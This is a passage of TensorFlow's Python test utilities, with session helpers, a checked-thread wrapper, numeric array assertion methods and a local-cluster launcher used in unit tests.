`cached_session` will by default reuse the same session within the same
test. The session returned by this function will only be closed at the end
of the test (in the TearDown function).
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
    possible. If both `force_gpu` and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.cached_session(use_gpu=True) as sess:
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
          self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0])
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield FakeEagerSession(self)
else:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=True)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
@contextlib.contextmanager
@deprecation.deprecated(None, "Use `self.session()` or "
"`self.cached_session()` instead.")
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Use cached_session instead."""
if self.id().endswith(".test_session"):
self.skipTest(
"Tests that have the name \"test_session\" are automatically skipped "
"by TensorFlow test fixture, as the name is reserved for creating "
"sessions within tests. Please rename your test if you have a test "
"with this name.")
if context.executing_eagerly():
yield None
else:
if graph is None:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=False)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
else:
with self.session(graph, config, use_gpu, force_gpu) as sess:
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
self._is_thread_joined = False
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
        self._testcase.failureException: If the thread terminates due to
          an exception.
"""
self._is_thread_joined = True
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
      This method returns True from just before the run() method starts
      until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def check_termination(self):
"""Returns whether the checked thread was properly used and did terminate.
Every checked thread should be "join"ed after starting, and before the
test tears down. If it is not joined, it is possible the thread will hang
and cause flaky failures in tests.
Raises:
self._testcase.failureException: If check_termination was called before
thread was joined.
RuntimeError: If the thread is not terminated. This means thread was not
joined with the main thread.
"""
if self._is_thread_joined:
if self.is_alive():
raise RuntimeError(
"Thread was not joined with main thread, and is still running "
"when the test finished.")
else:
self._testcase.fail("A checked thread was not joined.")
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
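    A usage sketch (`compute_something` is a hypothetical helper in the test):
    ```python
    def worker():
      self.assertGreater(compute_something(), 0)
    t = self.checkedThread(target=worker)
    t.start()
    t.join()  # Assertion failures in worker() surface as test failures here.
    ```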
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
# pylint: enable=invalid-name
@py_func_if_in_function
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
    Checks that |f1 - f2| <= err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
# f1 == f2 is needed here as we might have: f1, f2 = inf, inf
self.assertTrue(
f1 == f2 or math.fabs(f1 - f2) <= err, "%f != %f +/- %f%s" %
(f1, f2, err, " (%s)" % msg if msg is not None else ""))
@py_func_if_in_function
def assertArrayNear(self, farray1, farray2, err, msg=None):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
msg: Optional message to report on failure.
"""
self.assertEqual(len(farray1), len(farray2), msg=msg)
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err, msg=msg)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
@py_func_if_in_function
def assertNDArrayNear(self, ndarray1, ndarray2, err, msg=None):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
msg: Optional message to report on failure.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err), msg=msg)
def _GetNdArray(self, a):
# If a is tensor-like then convert it to ndarray
if tensor_util.is_tensor(a):
if isinstance(a, ops._EagerTensorBase):
a = a.numpy()
else:
a = self.evaluate(a)
if not isinstance(a, np.ndarray):
return np.array(a)
return a
def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# When the array rank is small, print its contents. Numpy array printing is
# implemented using inefficient recursion so prints can cause tests to
# time out.
if a.shape != b.shape and (b.ndim <= 3 or b.size < 500):
shape_mismatch_msg = ("Shape mismatch: expected %s, got %s with contents "
"%s.") % (a.shape, b.shape, b)
else:
shape_mismatch_msg = "Shape mismatch: expected %s, got %s." % (a.shape,
b.shape)
self.assertEqual(a.shape, b.shape, shape_mismatch_msg)
msgs = [msg]
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Adds more details to np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# tell user which elements violate such conditions.
cond = np.logical_or(
np.abs(a - b) > atol + rtol * np.abs(b),
np.isnan(a) != np.isnan(b))
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
msgs.append("not close where = {}".format(np.where(cond)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not close lhs = {}".format(x))
msgs.append("not close rhs = {}".format(y))
msgs.append("not close dif = {}".format(np.abs(x - y)))
msgs.append("not close tol = {}".format(atol + rtol * np.abs(y)))
msgs.append("dtype = {}, shape = {}".format(a.dtype, a.shape))
# TODO(xpan): There seems to be a bug:
# tensorflow/compiler/tests:binary_ops_test pass with float32
# nan even though the equal_nan is False by default internally.
np.testing.assert_allclose(
a, b, rtol=rtol, atol=atol, err_msg="\n".join(msgs), equal_nan=True)
def _assertAllCloseRecursive(self,
a,
b,
rtol=1e-6,
atol=1e-6,
path=None,
msg=None):
path = path or []
path_str = (("[" + "][".join(str(p) for p in path) + "]") if path else "")
msg = msg if msg else ""
# Check if a and/or b are namedtuples.
if hasattr(a, "_asdict"):
a = a._asdict()
if hasattr(b, "_asdict"):
b = b._asdict()
a_is_dict = isinstance(a, collections_abc.Mapping)
if a_is_dict != isinstance(b, collections_abc.Mapping):
raise ValueError("Can't compare dict to non-dict, a%s vs b%s. %s" %
(path_str, path_str, msg))
if a_is_dict:
self.assertItemsEqual(
a.keys(),
b.keys(),
msg="mismatched keys: a%s has keys %s, but b%s has keys %s. %s" %
(path_str, a.keys(), path_str, b.keys(), msg))
for k in a:
path.append(k)
self._assertAllCloseRecursive(
a[k], b[k], rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
elif isinstance(a, (list, tuple)):
      # Try to directly compare a, b as ndarrays; if that does not work, then
      # traverse through the sequence, which is more expensive.
try:
a_as_ndarray = self._GetNdArray(a)
b_as_ndarray = self._GetNdArray(b)
self._assertArrayLikeAllClose(
a_as_ndarray,
b_as_ndarray,
rtol=rtol,
atol=atol,
msg="Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg))
except (ValueError, TypeError) as e:
if len(a) != len(b):
raise ValueError(
"Mismatched length: a%s has %d items, but b%s has %d items. %s" %
(path_str, len(a), path_str, len(b), msg))
for idx, (a_ele, b_ele) in enumerate(zip(a, b)):
path.append(str(idx))
self._assertAllCloseRecursive(
a_ele, b_ele, rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
# a and b are ndarray like objects
else:
try:
self._assertArrayLikeAllClose(
a,
b,
rtol=rtol,
atol=atol,
msg=("Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg)))
except TypeError as e:
msg = ("Error: a%s has %s, but b%s has %s. %s" %
(path_str, type(a), path_str, type(b), msg))
e.args = ((e.args[0] + " : " + msg,) + e.args[1:])
raise
@py_func_if_in_function
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
"""Asserts that two structures of numpy arrays or Tensors, have near values.
`a` and `b` can be arbitrarily nested structures. A layer of a nested
structure can be a `dict`, `namedtuple`, `tuple` or `list`.
Note: the implementation follows
[`numpy.allclose`](https://docs.scipy.org/doc/numpy/reference/generated/numpy.allclose.html)
(and numpy.testing.assert_allclose). It checks whether two arrays are
element-wise equal within a tolerance. The relative difference
(`rtol * abs(b)`) and the absolute difference `atol` are added together
to compare against the absolute difference between `a` and `b`.
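    For example, with the default tolerances the pair `(1.0, 1.0 + 1.5e-6)`
    passes, since the allowed difference is `atol + rtol * abs(b)`, roughly
    `2e-6`, while the pair `(0.1, 0.1 + 1.5e-6)` fails, since the allowed
    difference shrinks to roughly `1.1e-6`.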
Args:
      a: The expected numpy `ndarray`, or anything that can be converted into a
        numpy `ndarray` (including Tensor), or any arbitrarily nested structure
        of these.
      b: The actual numpy `ndarray`, or anything that can be converted into a
        numpy `ndarray` (including Tensor), or any arbitrarily nested structure
        of these.
rtol: relative tolerance.
atol: absolute tolerance.
msg: Optional message to report on failure.
Raises:
ValueError: if only one of `a[p]` and `b[p]` is a dict or
`a[p]` and `b[p]` have different length, where `[p]` denotes a path
to the nested structure, e.g. given `a = [(1, 1), {'d': (6, 7)}]` and
`[p] = [1]['d']`, then `a[p] = (6, 7)`.
"""
if ragged_tensor.is_ragged(a) or ragged_tensor.is_ragged(b):
return self._assertRaggedClose(a, b, rtol, atol, msg)
self._assertAllCloseRecursive(a, b, rtol=rtol, atol=atol, msg=msg)
@py_func_if_in_function
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3,
bfloat16_rtol=1e-2,
bfloat16_atol=1e-2,
msg=None):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
    In particular, the tolerance is relaxed to 1e-3 if at least
    one of the arguments is of type float16.
Args:
      a: the expected numpy ndarray or anything that can be converted to one.
      b: the actual numpy ndarray or anything that can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
bfloat16_rtol: relative tolerance for bfloat16.
bfloat16_atol: absolute tolerance for bfloat16.
msg: Optional message to report on failure.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# types with lower tol are put later to overwrite previous ones.
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
if (a.dtype == dtypes.bfloat16.as_numpy_dtype or
b.dtype == dtypes.bfloat16.as_numpy_dtype):
rtol = max(rtol, bfloat16_rtol)
atol = max(atol, bfloat16_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol, msg=msg)
@py_func_if_in_function
def assertNotAllClose(self, a, b, **kwargs):
"""Assert that two numpy arrays, or Tensors, do not have near values.
Args:
a: the first value to compare.
b: the second value to compare.
**kwargs: additional keyword arguments to be passed to the underlying
`assertAllClose` call.
Raises:
AssertionError: If `a` and `b` are unexpectedly close at all elements.
"""
try:
self.assertAllClose(a, b, **kwargs)
except AssertionError:
return
raise AssertionError("The two values are close at all elements")
@py_func_if_in_function
def assertAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays or Tensors have the same values.
Args:
      a: the expected numpy ndarray or anything that can be converted to one.
      b: the actual numpy ndarray or anything that can be converted to one.
msg: Optional message to report on failure.
"""
if (ragged_tensor.is_ragged(a) or ragged_tensor.is_ragged(b)):
return self._assertRaggedEqual(a, b, msg)
msg = msg if msg else ""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# Arbitrary bounds so that we don't print giant tensors.
if (b.ndim <= 3 or b.size < 500):
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" Contents: %s. \n%s." % (a.shape, b.shape, b, msg))
else:
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" %s" % (a.shape, b.shape, msg))
same = (a == b)
if (a.dtype in [
np.float16, np.float32, np.float64, dtypes.bfloat16.as_numpy_dtype
]):
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
msgs = [msg]
if not np.all(same):
# Adds more details to np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
msgs.append("not equal where = {}".format(np.where(diff)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not equal lhs = {}".format(x))
msgs.append("not equal rhs = {}".format(y))
# With Python 3, we need to make sure the dtype matches between a and b.
b = b.astype(a.dtype)
np.testing.assert_array_equal(a, b, err_msg="\n".join(msgs))
@py_func_if_in_function
def assertNotAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays or Tensors do not have the same values.
Args:
      a: the expected numpy ndarray or anything that can be converted to one.
      b: the actual numpy ndarray or anything that can be converted to one.
msg: Optional message to report on failure.
"""
try:
self.assertAllEqual(a, b)
except AssertionError:
return
raise AssertionError("The two values are equal at all elements. %s" % msg)
@py_func_if_in_function
def assertAllGreater(self, a, comparison_target):
"""Assert element values are all greater than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreater(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLess(self, a, comparison_target):
"""Assert element values are all less than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLess(np.max(a), comparison_target)
@py_func_if_in_function
def assertAllGreaterEqual(self, a, comparison_target):
"""Assert element values are all greater than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreaterEqual(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLessEqual(self, a, comparison_target):
"""Assert element values are all less than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLessEqual(np.max(a), comparison_target)
def _format_subscripts(self, subscripts, value, limit=10, indent=2):
"""Generate a summary of ndarray subscripts as a list of str.
    If limit == N, this method will print up to the first N subscripts on
    separate lines. A line of ellipses (...) will be appended at the end if the
    number of subscripts exceeds N.
Args:
subscripts: The tensor (np.ndarray) subscripts, of the same format as
np.where()'s return value, i.e., a tuple of arrays with each array
corresponding to a dimension. E.g., (array([1, 1]), array([0, 1])).
value: (np.ndarray) value of the tensor.
limit: (int) The maximum number of indices to print.
indent: (int) Number of characters to indent at the beginning of each
line.
Returns:
(list of str) the multi-line representation of the subscripts and values,
potentially with omission at the end.
"""
lines = []
subscripts = np.transpose(subscripts)
prefix = " " * indent
for subscript in itertools.islice(subscripts, limit):
lines.append(prefix + str(subscript) + " : " +
str(value[tuple(subscript)]))
if len(subscripts) > limit:
lines.append(prefix + "...")
return lines
@py_func_if_in_function
def assertAllInRange(self,
target,
lower_bound,
upper_bound,
open_lower_bound=False,
open_upper_bound=False):
"""Assert that elements in a Tensor are all in a given range.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
lower_bound: lower bound of the range
upper_bound: upper bound of the range
open_lower_bound: (`bool`) whether the lower bound is open (i.e., > rather
than the default >=)
open_upper_bound: (`bool`) whether the upper bound is open (i.e., < rather
than the default <=)
Raises:
AssertionError:
if the value tensor does not have an ordered numeric type (float* or
int*), or
if there are nan values, or
if any of the elements do not fall in the specified range.
"""
target = self._GetNdArray(target)
if not (np.issubdtype(target.dtype, np.floating) or
np.issubdtype(target.dtype, np.integer)):
raise AssertionError(
"The value of %s does not have an ordered numeric type, instead it "
"has type: %s" % (target, target.dtype))
nan_subscripts = np.where(np.isnan(target))
if np.size(nan_subscripts):
raise AssertionError(
"%d of the %d element(s) are NaN. "
"Subscripts(s) and value(s) of the NaN element(s):\n" %
(len(nan_subscripts[0]), np.size(target)) +
"\n".join(self._format_subscripts(nan_subscripts, target)))
range_str = (("(" if open_lower_bound else "[") + str(lower_bound) + ", " +
str(upper_bound) + (")" if open_upper_bound else "]"))
violations = (
np.less_equal(target, lower_bound) if open_lower_bound else np.less(
target, lower_bound))
violations = np.logical_or(
violations,
np.greater_equal(target, upper_bound)
if open_upper_bound else np.greater(target, upper_bound))
violation_subscripts = np.where(violations)
if np.size(violation_subscripts):
raise AssertionError(
"%d of the %d element(s) are outside the range %s. " %
(len(violation_subscripts[0]), np.size(target), range_str) +
"Subscript(s) and value(s) of the offending elements:\n" +
"\n".join(self._format_subscripts(violation_subscripts, target)))
@py_func_if_in_function
def assertAllInSet(self, target, expected_set):
"""Assert that elements of a Tensor are all in a given closed set.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_set: (`list`, `tuple` or `set`) The closed set that the elements
of the value of `target` are expected to fall into.
Raises:
AssertionError:
if any of the elements do not fall into `expected_set`.
"""
target = self._GetNdArray(target)
# Elements in target that are not in expected_set.
diff = np.setdiff1d(target.flatten(), list(expected_set))
if np.size(diff):
raise AssertionError("%d unique element(s) are not in the set %s: %s" %
(np.size(diff), expected_set, diff))
@py_func_if_in_function
def assertDTypeEqual(self, target, expected_dtype):
"""Assert ndarray data type is equal to expected.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_dtype: Expected data type.
"""
target = self._GetNdArray(target)
    # Wrap a single ndarray in a list so the loop below works; leave an
    # existing list untouched (otherwise `arrays` would be undefined).
    arrays = target if isinstance(target, list) else [target]
for arr in arrays:
self.assertEqual(arr.dtype, expected_dtype)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
If the exception is an OpError, the op stack is also included in the message
predicate search.
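    A usage sketch (`compute_sqrt` is a hypothetical helper expected to raise):
    ```python
    with self.assertRaisesWithPredicateMatch(ValueError, "non-negative"):
      compute_sqrt(-1.0)
    # A callable predicate may be used instead of a regular expression:
    with self.assertRaisesWithPredicateMatch(
        ValueError, lambda e: "non-negative" in str(e)):
      compute_sqrt(-1.0)
    ```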
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in exception and returns True
(success) or False (please fail the test). Otherwise, the error message
is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message if isinstance(e, errors.OpError) else str(e)
op = e.op if isinstance(e, errors.OpError) else None
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op # pylint: disable=protected-access
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
except Exception as e: # pylint: disable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError("Exception of type %s: %s" %
(str(type(e)), str(e)))
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
def assertShapeEqual(self, np_array, tf_tensor, msg=None):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
msg: Optional message to report on failure.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(
np_array.shape, tf_tensor.get_shape().as_list(), msg=msg)
def assertDeviceEqual(self, device1, device2, msg=None):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
msg: Optional message to report on failure.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(
device1, device2,
"Devices %s and %s are not equal. %s" % (device1, device2, msg))
def _GetPyList(self, a):
"""Converts `a` to a nested python list."""
if isinstance(a, ragged_tensor.RaggedTensor):
return self.evaluate(a).to_list()
elif isinstance(a, ops.Tensor):
a = self.evaluate(a)
return a.tolist() if isinstance(a, np.ndarray) else a
elif isinstance(a, np.ndarray):
return a.tolist()
elif isinstance(a, ragged_tensor_value.RaggedTensorValue):
return a.to_list()
else:
return np.array(a).tolist()
def _assertRaggedEqual(self, a, b, msg):
"""Asserts that two ragged tensors are equal."""
a_list = self._GetPyList(a)
b_list = self._GetPyList(b)
self.assertEqual(a_list, b_list, msg)
if not (isinstance(a, (list, tuple)) or isinstance(b, (list, tuple))):
a_ragged_rank = a.ragged_rank if ragged_tensor.is_ragged(a) else 0
b_ragged_rank = b.ragged_rank if ragged_tensor.is_ragged(b) else 0
self.assertEqual(a_ragged_rank, b_ragged_rank, msg)
def _assertRaggedClose(self, a, b, rtol, atol, msg=None):
a_list = self._GetPyList(a)
b_list = self._GetPyList(b)
self._assertListCloseRecursive(a_list, b_list, rtol, atol, msg)
if not (isinstance(a, (list, tuple)) or isinstance(b, (list, tuple))):
a_ragged_rank = a.ragged_rank if ragged_tensor.is_ragged(a) else 0
b_ragged_rank = b.ragged_rank if ragged_tensor.is_ragged(b) else 0
self.assertEqual(a_ragged_rank, b_ragged_rank, msg)
def _assertListCloseRecursive(self, a, b, rtol, atol, msg, path="value"):
self.assertEqual(type(a), type(b))
if isinstance(a, (list, tuple)):
self.assertLen(a, len(b), "Length differs for %s" % path)
for i in range(len(a)):
self._assertListCloseRecursive(a[i], b[i], rtol, atol, msg,
"%s[%s]" % (path, i))
else:
self._assertAllCloseRecursive(a, b, rtol, atol, path, msg)
# Fix Python 3+ compatibility issues
if not six.PY2:
# pylint: disable=invalid-name
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
assertItemsEqual = googletest.TestCase.assertCountEqual
# pylint: enable=invalid-name
@contextlib.contextmanager
def _constrain_devices_and_set_default(self, sess, use_gpu, force_gpu):
"""Set the session and its graph to global default and constrain devices."""
if context.executing_eagerly():
yield None
else:
with sess.graph.as_default(), sess.as_default():
if force_gpu:
# Use the name of an actual device if one is detected, or
# '/device:GPU:0' otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/device:CPU:0"):
yield sess
def _create_session(self, graph, config, force_gpu):
"""See session() for details."""
def prepare_config(config):
"""Returns a config for sessions.
Args:
config: An optional config_pb2.ConfigProto to use to configure the
session.
Returns:
A config_pb2.ConfigProto object.
"""
# TODO(b/114333779): Enforce allow_soft_placement=False when
# use_gpu=False. Currently many tests rely on the fact that any device
# will be used even when a specific device is supposed to be used.
allow_soft_placement = not force_gpu
if config is None:
config = context.context().config
config.allow_soft_placement = allow_soft_placement
      elif not allow_soft_placement and config.allow_soft_placement:
        # Copy the caller's config so it is not mutated when soft placement is
        # disabled for this session.
        config_copy = context.context().config
        config_copy.CopyFrom(config)
        config = config_copy
        config.allow_soft_placement = False
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
# Disable Grappler constant folding since some tests & benchmarks
# use constant input and become meaningless after constant folding.
# DO NOT DISABLE GRAPPLER OPTIMIZERS WITHOUT CONSULTING WITH THE
# GRAPPLER TEAM.
config.graph_options.rewrite_options.constant_folding = (
rewriter_config_pb2.RewriterConfig.OFF)
config.graph_options.rewrite_options.pin_to_host_optimization = (
rewriter_config_pb2.RewriterConfig.OFF)
return config
return ErrorLoggingSession(graph=graph, config=prepare_config(config))
def _get_cached_session(self,
graph=None,
config=None,
force_gpu=False,
crash_if_inconsistent_args=True):
"""See cached_session() for documentation."""
if self._cached_session is None:
sess = self._create_session(
graph=graph, config=config, force_gpu=force_gpu)
self._cached_session = sess
self._cached_graph = graph
self._cached_config = config
self._cached_force_gpu = force_gpu
return sess
else:
if crash_if_inconsistent_args and self._cached_graph is not graph:
raise ValueError("The graph used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and self._cached_config is not config:
raise ValueError("The config used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and (self._cached_force_gpu is
not force_gpu):
raise ValueError(
"The force_gpu value used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
return self._cached_session
@tf_export("test.create_local_cluster")
def create_local_cluster(num_workers,
num_ps,
protocol="grpc",
worker_config=None,
ps_config=None):
"""Create and start local servers and return the associated `Server` objects.
"PS" stands for "parameter server": a task responsible for storing and
updating the model's parameters. Other tasks send updates to these parameters
as they work on optimizing the parameters. This particular division of labor
between tasks is not required, but is common for distributed training.
Read more at https://www.tensorflow.org/guide/extend/architecture

Figure illustrates the interaction of these components.
"/job:worker/task:0" and "/job:ps/task:0" are both tasks with worker services.
Example:
```python
workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)
worker_sessions = [tf.compat.v1.Session(w.target) for w in workers]
with tf.device("/job:ps/task:0"):
...
with tf.device("/job:ps/task:1"):
...
with tf.device("/job:worker/task:0"):
...
with tf.device("/job:worker/task:1"):
...
worker_sessions[0].run(...)
```
Args:
num_workers: Number of worker servers to start.
num_ps: Number of PS servers to start.
protocol: Communication protocol. Allowed values are documented in the
documentation of `tf.distribute.Server`.
worker_config: (optional) `tf.ConfigProto` to initialize workers. Can be
used to instantiate multiple devices etc.
ps_config: (optional) `tf.ConfigProto` to initialize PS servers.
Returns:
A tuple `(worker_servers, ps_servers)`. `worker_servers` is a list
of `num_workers` objects of type `tf.distribute.Server` (all running
locally);
and `ps_servers` is a list of `num_ps` objects of similar type.
Raises:
ImportError: if portpicker module was not found at load time
"""
import portpicker # pylint: disable=g-import-not-at-top
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]
}
cs = server_lib.ClusterSpec(cluster_dict)
workers = [
server_lib.Server(
cs,
job_name="worker",
protocol=protocol,
task_index=ix,
config=worker_config,
start=True) for ix in range(num_workers)
]
ps_servers = [
server_lib.Server(
cs,
job_name="ps",
protocol=protocol,
task_index=ix,
config=ps_config,
start=True) for ix in range(num_ps)
]
return workers, ps_servers
def get_node_def_from_graph(node_name, graph_def):
"""Returns the `NodeDef` instance for given node name in the graph def.
This method explores only the NodeDefs in `graph_def.node`.
Args:
node_name: Name of the NodeDef to search for.
graph_def: An instance of `GraphDef` proto.
Returns:
the `NodeDef` instance whose name field matches the given node_name or None.
"""
for node_def in graph_def.node:
if node_def.name == node_name:
return node_def
return None
def set_producer_version(graph, producer_version):
"""Sets graph.graph_def_versions.producer to `producer_version`."""
# The C API doesn't expose altering GraphDefVersions. We can indirectly set
# it via import_graph_def though.
graph_def = graph_pb2.GraphDef()
graph_def.versions.producer = producer_version
with graph.as_default():
importer.import_graph_def(graph_def)
